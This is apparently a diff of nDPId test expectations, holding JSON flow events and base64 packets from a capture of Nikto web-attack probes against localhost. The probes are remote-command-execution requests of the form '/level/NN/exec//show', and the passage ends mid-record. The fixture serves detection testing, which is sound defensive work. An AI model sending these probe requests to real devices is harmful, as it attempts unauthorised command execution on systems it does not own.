00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1576420277709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277709,"pkt":"AAAAAAAAAAAAAAAACABFAADIleJAAEAGpkt\/AAABfwAAAcaGH5A96Kz0htu5TYAYAED+vAAAAQEICp1m\/vWdZv71R0VUIC9sZXZlbC84Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/82\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001329)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/82\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001329)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1576420277711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277711,"pkt":"AAAAAAAAAAAAAAAACABFAADIwilAAEAGegR\/AAABfwAAAcaIH5AoWfs0DfPUMYAYAED+vAAAAQEICp1m\/vedZv73R0VUIC9sZXZlbC84My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/83\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001330)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/83\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001330)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1576420277713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277713,"pkt":"AAAAAAAAAAAAAAAACABFAADIsuZAAEAGiUd\/AAABfwAAAcaKH5B+eYvxDWxq9oAYAED+vAAAAQEICp1m\/vmdZv75R0VUIC9sZXZlbC84NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/84\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001331)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/84\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001331)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1576420277715,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277715,"pkt":"AAAAAAAAAAAAAAAACABFAADIFWJAAEAGJsx\/AAABfwAAAcaMH5B2cix1DMITXYAYAED+vAAAAQEICp1m\/vudZv77R0VUIC9sZXZlbC84NS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/85\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001332)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/85\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001332)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1576420277716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277716,"pkt":"AAAAAAAAAAAAAAAACABFAADIj0FAAEAGrOx\/AAABfwAAAcaOH5BnL7Yrjj53uYAYAED+vAAAAQEICp1m\/vydZv78R0VUIC9sZXZlbC84Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/86\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001333)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/86\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001333)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1576420277718,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277718,"pkt":"AAAAAAAAAAAAAAAACABFAADI9rtAAEAGRXJ\/AAABfwAAAcaQH5Cd5s+tew18QIAYAED+vAAAAQEICp1m\/v6dZv7+R0VUIC9sZXZlbC84Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/87\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001334)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/87\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001334)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1576420277719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277719,"pkt":"AAAAAAAAAAAAAAAACABFAADIwR1AAEAGexB\/AAABfwAAAcaSH5DFAfgO5Rn4M4AYAED+vAAAAQEICp1m\/v+dZv7\/R0VUIC9sZXZlbC84OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzUpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/88\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001335)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/88\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001335)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1576420277721,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277721,"pkt":"AAAAAAAAAAAAAAAACABFAADIEWBAAEAGKs5\/AAABfwAAAcaUH5BnvihJZne+zoAYAED+vAAAAQEICp1m\/wGdZv8BR0VUIC9sZXZlbC84OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/89\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001336)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 